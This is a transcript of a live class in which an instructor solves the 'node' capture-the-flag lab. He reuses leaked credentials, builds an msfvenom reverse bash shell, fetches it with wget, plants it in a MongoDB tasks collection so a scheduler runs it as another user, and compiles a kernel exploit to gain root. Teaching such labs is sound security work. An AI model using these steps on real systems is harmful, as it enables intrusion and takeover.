I mean, let's start in a couple of minutes, all right? All right, hi guys. Let's start from where we left off yesterday, and I guess this is where we downloaded this, right? Okay, we downloaded this and we got this uh, var directory out of here, right? Am I audible?
Yes.
Okay, perfect. And we also had some passwords, right? So
Right.
Tom had this password, Mark had this, and So do you remember where the passwords are? Wow, this is a really long file. Okay. So we had the passwords, right? So these were the passwords. SpongeBob, SpongeBob, Snowflake, and which one was right? F73. Snowflake is Mark's password, and Tom's password is SpongeBob. Oh no, no, no. 240. Tom's password is SpongeBob, and Mark's password is Snowflake, and the other one was Manchester, which was the admin's password. Okay, we might need them, so I just made sure that we know that. All right. Okay. So now we have this var folder with us. So let's. Where was the var folder? Okay. So we had a var folder with us. So let's just go there, cd var, and have a look. There is a www. So, okay, cd my place ls. Okay, we have some code here. Okay, so right at the beginning, I can tell you that this is somehow related to Node.js because there is a package.json. Okay, so if there is a package.json here, okay, that means it has Node.js. All right, just remember that it's going to be like true every time. Okay, so there is a file called app.js, which is clearly the one which is related to Node.js because there is nothing else here. So what I'm going to do is less app.js, right? I'll open it up and I'll have a look at the code. So this is probably the backend.
What does the list command do?
It just makes it, you can read it. You can read the file like this.
Okay.
All right. So remember when we had all of these endpoints? Okay. So this is the backend which is controlling it. All right. So
Right.
this is the backend. This is the server code which is running because of which we are able to access it. So Express is the one which is being used inside Node.js so that this backend can be, and immediately we see that we see the credentials of MongoDB. Okay, MongoDB is the database which is being used. All right. So earlier we have seen MySQL. Okay, and to connect to MySQL, we also needed a password and a username. Similarly, in MongoDB, which is also a sort of database management system, we need a username and a password. All right. So it has a username and a password. So I'm now suspicious that maybe we can use this for the same, like we use this same credentials for different purposes as well. Like remember we had the SSH port open as well. Okay, so let's try that. Correct. So what we can do is let's just do one thing. So our, let's make sure that it's there. I think the IP address has changed from I get it was 18, I guess, but now it has changed to 46. So what I'm going to do is we'll try to connect to the SSH. Okay, we'll try to connect to SSH port of this node machine. Okay, all right. Because yesterday when we did the nmap, we had found out that there was SSH port, the port 22, which are also open. So SSH, I guess it was, yeah, mark, right? Mark at the rate of this IP address 192.168.29.46. Okay, it will ask me a password and I'll type this password 5AY-RFT73BTF-PC84K. Enter. Okay, that was actually very likely. All right. So now we have the access to this machine. Okay. So PWD, OMI, ID. These are the ones that we always check at the beginning, right? Again. So if we do ls here, there is nothing. So ls minus a, there really does not seem to be anything important here. cd dot dot ls. Okay, there are 3 folders inside the home. Okay, pwd, I'm inside home, and there are 3 directories here, Frank, Mark, Tom. So clearly there are 3 users in this system. Okay, and the names of the 3 users are what? Frank, Mark, and Tom. Okay, so inside the Mark directory, there is nothing. It's completely empty. Okay, so what we can do is we can cd to Tom and ls. There is a user.txt. So cat user.txt. .exe which will contain our flag probably, but permission is denied because I am not Tom. Who am I? I am Mark.
Oh,
Okay, we need to be Tom to continue. So what I'm going to do is, I think we have already used this command in another CTF before. So let's just find out the different processes that are running, okay, inside this system. So ps oct is the command for that, right? These are all of the processes and the users which are using them. Okay, so there are some Tom and Mark processes. So what I can do is, uh, let me just make it a bit bigger. Okay, so again, ps opt grep Tom, because we only need the processes that the user is running. Okay, Tom, the Tom user is running, and immediately we see that grep. Okay, so this is the process that I use to connect to to run this command. So this is eliminated. So we have two here. Slash var slash www slash my place slash app.js. Okay, so the website is being run by Tom, and we already have this code, right? We have looked at this code. This app.js is being run by Tom. Okay, wow, this is a really long thing. Okay, no problem. And what is this var scheduler app.js? So let's try that one. Again, less slash var slash scheduler slash app.js. Let's look at this code. Luckily enough, even this opens so easily. Okay, this also seems to be some sort of uh, Node.js code only. Okay, let's try to understand this code. Okay, all right. So again, you do not exactly need to understand the code exactly, but from the words which are obviously in English, we can kind of infer what is happening here, right? So obviously it's sort of connecting to MongoDB somehow. And so in MongoDB, just understand the format of this, okay? So you need to understand until here. This is fine. Okay, this is extra. So this is obviously the MongoDB protocol. Okay, so then it goes to the MongoDB port, which is 27,017, I think 27017. Okay, then we have the username, we have the password, we have the host. So it could be an IP address, or in this case, since the database is inside this machine itself, so it's localhost. And oh yeah, see the port is 27017. Okay, and then this is the name of the database. Okay, just remember this part. Okay, so it's connecting. Okay, so yeah, so see mongo client.connect, obviously it's sort of connecting. So I'll tell you one more thing. Even though I use MongoDB a lot, I actually do not use the MongoDB API. I use another API called Mongoose. So this code even I don't understand
yeah,
exactly.
Mongoose.
Yeah, so Mongoose is more convenient. Okay, so this code, even I kind of don't understand what's happening. Okay, but again, I'm just going to infer. Okay, my point is that you don't exactly need to know, uh, you know, what's specifically happening. You just need to be able to infer correctly what's happening. Okay, so it's setting some sort of interval. Okay, So again, in MongoDB, we have collections. Okay. So in MySQL, we had tables. Instead of tables, we have a collection. Okay. And instead of rows of data, we have documents of data. Okay. That's why MongoDB is kind of more convenient to use because it goes away from the table format. Like the logic being that if I like give you a sort of register, okay, which has only tables, okay, and I tell you that everything that happens in your life, everything that you need to note down, just note down in this. You can note down many things, but eventually it's going to be inconvenient for you. Like when you were, let's say, writing an article or something. Okay, but again, if you use MongoDB, it has documents. So instead of a register, if I give you an empty notebook, it's more convenient to write stuff there, right? So that's what's happening here. Okay. So it has the collections and documents instead of tables and rows, right? Okay. So again, there is a collection inside the DB tasks where it's trying to find something. Okay. And it's executing some sort of task from the comment that has there from. Okay, so since it's using for each, so
It's a
whatever the
for loop,
result
right?
is there, yeah, for each is
Which
kind
loop?
of like yeah, for loop. So whatever see this doc, okay, so when it uh, made this search find, okay, so the result that was there, so for every result, okay, for every document, it's kind of execute, okay, exec. This is a JavaScript command that we all know. Okay, this is a JavaScript command. This is nothing related to this. Is something that you should know. Okay, and then it's deleting that entry. Okay, so inside this collection, there is a CMD. Okay, so remember we had the password. Say this ID, username, and password. Okay, here it has what ID and CMD. Okay, are you able to kind of get what I'm trying to do here? I mean, sorry, what I'm trying to say. So inside this collection, okay, there is a document, and inside that document there is an ID and a CMD. Okay, so ID is just being used to recognize that particular document, like we did with, the phone number or something as a primary key in
Right.
SQL. Okay, and exact. So whatever CMD is here, whatever value is here, okay, it's executing. And since it's written as CMD, I'm guessing that it's going to be some sort of command. Okay, so this code is executing a command. Okay, just think about the consequences of this. It's executing some sort of command, and if we are able to connect to this one, okay, if we're able to connect to this the database, the scheduler database, we can actually enter some data inside this CMD. That data being a sort of command which we can then execute. It will be executed by itself. Oh, set interval. Oh, what's the interval? 30,000. So I guess 30,000 is 30 seconds. Okay. So basically what's happening is inside the scheduler database, there is a tasks collection inside which there is a document which will have a CMD parameter, a CMD key, and that is going to be executed every 30 seconds. It's going to search for it. Okay, it's going to search for the
What
CMD
is it? Where does it
every
want
30 seconds.
why I know that the set interval is some kind of a countdown kind of, right?
Yeah,
So I mean why would he want to delete the CMD command or document?
that only the programmer will know, right? Because it's just not the command, the key, the data, the CMD
Okay.
data. Okay, so it's just deleting that this particular one immediately after. So maybe it has some uh execution or something that the developer thought that they require. But since we can now misuse this implementation, okay, so that's what we are going to do. So we'll come back to our code and we'll use MSF Venom. Let's use which one do you want to use? Let's use the Python one maybe. We have Python. Bash. Let's use Bash. Okay, so this is using Bash. I even saw the Bash RC earlier. So MSF Venom minus P. What was the reverse bash, right? CMD Unix reverse underscore bash. Okay, let's use this one. It's correct. Okay, lhost equals what's my IP address? 55. All right. So lhost 192.168.29.55. L port, let's use 4444. Okay, minus F raw and what bash dot sh. All right. So we have the, oh wait, where did we save it? Oh, this one. Okay. So what we're going to do is ll bash exploit, right? So let's just do one thing. Let's get out of root user. And let's just give it full permission. Okay. chmod 777 bash exploit.sh and then python 3 act minus m http dot server. Was it this one? I hope it was this one. Okay, it was this one. On 8. Okay, so here what I'm going to do is I'm going to cd slash temp because we can download files here. All right, and this IP address, what was 55? Okay, I think it was 55. Yeah, so wget will download this one here. Okay, we'll download it. All right, so wget 192.168.29.55 slash bash dot sh and connection refused. I guess, oh yeah, I made a mistake here. I have to give the port 8000. Okay, so wget 192.168.29.55 port 1000 slash dot sh, and see the file is saved here. We have it. Okay, but then if we give dot slash bash exploit, nothing will happen because we already have control over Mark. We need control over Tom. Okay, so just remember the entire point of doing this thing is that this code, this thing, this scheduler app.js, okay, where the command, the cmd is being executed, is run by Tom. Okay, so what I'm trying to do here is we'll make this execute this. Okay, I want this to execute my exploit. So when it will be executed, we'll have control over Tom because Tom is running this one. Okay, and this is kind of really important to understand. So just tell me if you have any doubt in this part.
Can you explain that again?
Okay, no problem. Shall I just go from the start? Should I just tell you all the thing on the CD? Right? Oh wait, sorry, minus. Okay, so I'll just less. Oh wait, we had that file, right? Where was that file? Scheduler. Okay, so less slash var slash. I'll just start from here. Okay,
Okay.
so I checked inside the Mark users home folder and it was completely empty. Remember, more or less, except for the this just normal files profile and bash rc. It was empty, but inside the Tom user we have the user.txt, okay, which is the file that we want. Okay, see if I do ls now, but see who has the, where is the, yeah, see the user is Tom, the group is Tom at least. Okay, which has the read permission. Okay, so if I'm the Tom user, only then I'm going to be able to access this file. Okay, now I'm not able to because I'm not Tom. Who am I? I'm Mark. Okay, all right. I want to be Tom. So what I did was I just checked all of the processes that Tom is running. Okay, remember in one of the previous CTFs, what we did was we checked all of the processes that the root was running because we wanted to be root. Okay, right now I want to be Tom. Okay, so I'm trying to see the processes that Tom is running. And immediately I saw that the website, which is this one, okay, this one I mean, is being run by who? By Tom. Because see this one, see this we already got, all right? Remember, we don't need this anymore. So see this var wm my place. We like decoded it and unzipped it, and we got this one, right? So it's running this as well as there is a slash var slash scheduler slash app.js, which kind of seems like something that we should check, right? So what I did was cat slash var slash scheduler slash app.js, and inside it we found out that it's connecting to the database which is named scheduler. Okay, and inside that database we have a collection called tasks. Okay, if it's kind of difficult for you to like grasp what exactly task and cmd is, just think of tasks as table, but this will be kind of wrong, but also it's related. Okay. So inside a table named task, we have a column named CMD. Okay. Inside the table named task, we have a column which is named CMD. And inside the CMD, whatever is there is getting executed by this program, this app.js. Okay. So now what I'm trying to do is I made an exploit using MSF Venom, and I imported it to this system, and I have kept it inside the temp. Okay, I downloaded it inside temp, and I want to exploit it. I want to run it. Okay, but I want to run it using Tom. How to do that? Simply by using this program, which is running a command. All right, it's running a command. And when this program runs command, since this program is being run by who? Tom, who is actually by the transitive property, who is running the command?
Um,
Tom is running the command. So when we have our MSF console here, we'll have access to Tom. Okay. It's kind of not simple at all, actually. Okay. That's why I did this sit here, and this is why it's kind of really important to go through CTFs like this, because when you know when you appear for like the proper hacking exams, this is the kind of CTF that you have to solve. Okay. Now MSF console. Okay. Use exploits multi-header. Okay, we'll use the multi-header. So set sorry, payload. What was it? CMD, right? Yeah, CMD slash Unix slash reverse bash. Okay, so options set lhost 192.168.29.55, and again options. So L port is 4444, which is what we gave. All right, and then I'll just click on exploit, and it is running here. Now let's open MongoDB. Okay, here the way to connect to MongoDB is somewhat similar, actually exactly similar to MySQL actually, but instead of MySQL, we type MongoDB. Mongo, not even MongoDB. Okay, so minus U was Mark, and I know the okay, so let's do one thing. CD downloads, CD var www my place, right? Okay, cat app.js. Okay, so we had the password here somewhere. This one. Okay, I'll oh sorry. Copy it and minus p password, and then the name of the database, which we know to be what? Scheduler in this case. Okay, so scheduler, scheduler. And now we are connecting to cellular, connected to cellular as well. Okay, so honestly, I know this part, but you really don't. Just, you know, insert data in Mongo shell. Okay, we just need the command, right? So insert one, see, okay, db dot, this is the name of the table or the collection, and then we are going to use insert one, and then we are going to use this format. Okay, all right. So what are we trying to do? So one thing that we actually should have checked is if executable was there. So what I'm going to do is I'm going to exit from this one and ll/var, or not slash var, sorry, ll/temp. So we have always got to check that executable is running. See, there is no X, right? So what I'm going to do is chmod plus X slash temp slash bash exploit.sh. It would have been a very huge waste of time to not have done this, right? So again, ll/temp, see, executable is there now, it can be run. Okay, so we'll go back to our MongoDB now. Okay, so these are the kind of things that you kind of need to really remember. Okay, so we'll have a look at this one again. db dot what was the name of the document? I guess it was, I think it was tasks or task, I
On
think.
task.
Okay, yeah, so
With an S.
ts dot insert one. Okay, and I have to type the thing here. So cmd, right?
Yeah.
So here I am inserting the command that I want to run. Okay, I insert the command here, right? So this is what we have to do. Okay, so I want to run this bash exploit. So to run this, the very simple command is bash slash temp slash bash exploit. Okay, oh, sorry, dot sh. Okay, any doubt here? Any doubt in this one? Remember when we used to do insert into table name
Okay.
where user where phone number equal to something, values, username equals the value of username, and so on in Mongo, in MySQL. Okay, that's the same thing that we're doing here. Okay, so except I made a huge mistake. Should we insert one again? Any doubt in this one? Just ask me now if you have any doubt in this one.
So to run the bash script, you had to put bash and then the slash temp slash
Yeah,
exploit. Wow.
yeah. Basically, we are running that command. We are running this malware that we have. Okay, and to run .sh we use either // or we use bash. Okay, this is the command basically. Okay, that's all. Okay, but what we are doing here is we are inserting this value inside the tasks collection. Okay, or the table tasks. That's what we are doing here. All right, I'll click on enter and acknowledge is true. And if it was done in 30 seconds, we'll get connected. Oh, see, Session 1 opened. Okay. I hope something is here. Yeah, we got connected. See, this happened because every 30 seconds it was executing the CMD. Remember? Okay. So within a few seconds, it got connected. So who am I? Tom. So I am Tom right now. Okay. So PWD is slash. So I'll go to slash. I'll go to home slash Tom. Sorry, ls cat user.txt, and we have our first flag. All right. We got our first flag. Okay. Now we need to become the root user. Okay. So what we can do is maybe let's get the shell. So remember when we did this netsec. Oh, what happened here? Okay. So let's get the proper shell here. See, we have the dollar here now. Okay. So what we can do is we can find out the kernel version, okay, of this machine, okay, because like if we go to cd slash and ls, okay, cd root, can't cd to root. See, so inside the root folder there has to be the root, what is it called, the root flag. Okay. So because it was in the description of the CTF, it was written in the Hub website. Okay. So we need to become the root user. So the very simple thing that I'm going to do is I'm going to type a command which is known as new name minus a, and we have this. See, this is the kernel version. Okay. So what I'm going to do is I'll copy this and I'll go to Google and I'll ask Google that, okay, why is the internet so slow today? Exploit. Okay. So I'll just privilege escalation. Okay. You just have to make sure that Ubuntu something, right? x86. So 4.4.093 generate. If this is there, 4.0 less than 116. So ours is 93. So it should work. All right. So what I'm going to do is I'm going to this copy link location and ls. So I'm going to again, I have to go to what temp again, and I'll download it. So again, wget this command, and now we have this. This is the program that we have. It's a C program. All right, probably. Let's see this. Yeah, it's a C program. Okay, it's a C program. So what I'm going to do is I'm going to rename it because I want to make an executable of this one. So MV44298. So let's say program dot C. Okay, and now we have the program dot C. we'll just make it run. Okay, so GCC. So to run a C program, remember we used this earlier. Okay, so program.c, and let's make it privilege escalation. Okay, we'll make it. Okay, it even got. It was so yeah. So here I want to point out something. This VM just happened to have GCC. All right. Many times, many times it might not be there. Okay, many times because servers are usually like stripped of many unused software. So GCC is sometimes not there. So in that case, what we'll do is we'll download the exploit to our system. Okay, make the executable, download the executable here. Okay, so this is the executable that we have, and then we'll run it. Okay, so what we'll do is ll, okay, ls minus l, and this one has executable permission already. Okay, so dot slash priv as is it going to work? It's all right if it doesn't work, because we can then try another one. Let's see if there is any comment here. So nothing is here. Okay. Okay, it will probably not work. So let's try another one. Okay. Actually, no, I have tried this one only earlier. It did work. Okay. So maybe because we did not get the proper thing, maybe that's why. Oh, I can't import this session. Okay, I'm still inside here. So what I'm going to do is let's try a different one, because we did not get a proper shell. Oh yeah, we actually were root. This actually worked. All right. So who am I? Is root. Okay. So ID is 0. Okay. So cd slash root ls cat root.txt, and we have the root flag, and that's the end of our CTF. All right. So again, the entire CTF. Do you have any doubt?
It's a lot.
Sorry.
I say it's a lot going on.
Yeah, there is a lot going on. Actually, so what happened here? So it worked right here only. Okay. See, the moment I typed this, it came here only, except I thought that it did not work. But what happened was it was not shown properly. So when I just typed any command or something, immediately it came. Okay. So this part you already know, because we have used this kind of similar thing in other CTFs. I think we used something like this in Mr. Robot, right? Okay. So yeah, just go through it. Okay. So like a few years ago, what I did was I wrote. a walkthrough for this one. All right. And I was actually almost hired from this walkthrough. Okay.
Right.
To write for one of the biggest, so there is a hackingarticles.in. So they saw this and they asked me to write for them, but I did not want to write CTF for a living. All right. So I did not take that job, but I'll just give you this link. Okay.
Mhm.
I'm putting it in the chat.
I'm
And
trying to download the.
yeah, download the CTF. I'll give you the CTF link also. I hope I have given it here. No
I
problem.
think you might have given it to us before.
All right. Just in case you might need it, I'm giving it to you once more, right? Okay. So how I did it today and yesterday might be a bit different from how I did it in this. Okay.
Right.
But the answer is there. And I am pretty sure I did it mostly the same way. Right? And I have the thing is I've explained every process here. Okay. I've explained every step with great detail. Okay. And if you want more details, just search that particular topic. All right. And if you have any doubt, definitely ask me on Thursday. All right. I really need you to understand this CTF very, very nicely. All right. So make sure that I have gone to see the entire thing. So like for example, this fcrack zip. This used to be pre-installed in Kali Linux earlier when I had solved this. Okay, I solved it when the CTF came out. All right. So, so back then, like it was what 3 years ago, almost exactly 3 years ago, right? And yeah, so when I show like when I was showing it to you, I installed it first. Okay, so I did it a bit differently here, but most of the steps are like 90% it's same. Okay, couple of steps may be a bit different. So this one, see this step is different. Okay, I use Python 3 and not Python. So Python, this command is not going to work probably for you. So just make sure that you're using the newer version. Okay, Python 3 minus m http.server. All right, and the rest should be mostly same. Okay, so just give it a try and please go through the rest of the course and let's do some proper doubt clearance in the next session. All right.
All right.
Okay, even if the doubt seems silly, I want you to ask that doubt to me. Okay, so no doubt is small enough, no doubt is silly. Okay, just ask me the doubt because small doubts end up having great consequences sometimes. All right, from my own experience at least, I'm saying. Okay, so some of the screenshots also might look different. Okay, but it will work. All right.
All right.
Okay, so go through it, guys, and in the next session, do ask me. Okay,
Okay.
so see you on Thursday. Any
All right.
doubts here? No
I just
doubt,
have
right?
to like go through it again.
Okay, Razbir, any doubts? Good. Okay, so do try this one out, and then we'll
Hopefully, I
come
don't
back
have any
to.
problem with the ISO fly.
No, no, you will be able to install it. Don't worry. Just change the name to uh .ovf or something. I forgot. Wait, .ova, right? Yeah. So the
Yes.
name would be .ovf. Just change it to .ova and then just put it inside your VMware. Okay, it will run. All right.
I think it already comes with .ov. It says on it on the page. I think so. I don't know if I'm.
Sorry.
I mean, I looked at the page, the Von Hall page for the CTF. It says something about
Yeah, yeah,
.ova, but I don't know. Maybe you already has it. Can you check it quick? It says right there,
yeah. It is there. Yeah,
node.ova.
yeah. For me, it wasn't running on VirtualBox, so
Okay.
I ran it on VMware. So you can try either. If it doesn't work on one, try on the other one. Okay.
All right.
So see you in the next session. Thank you so much, guys.
All right. Well.
Bye bye.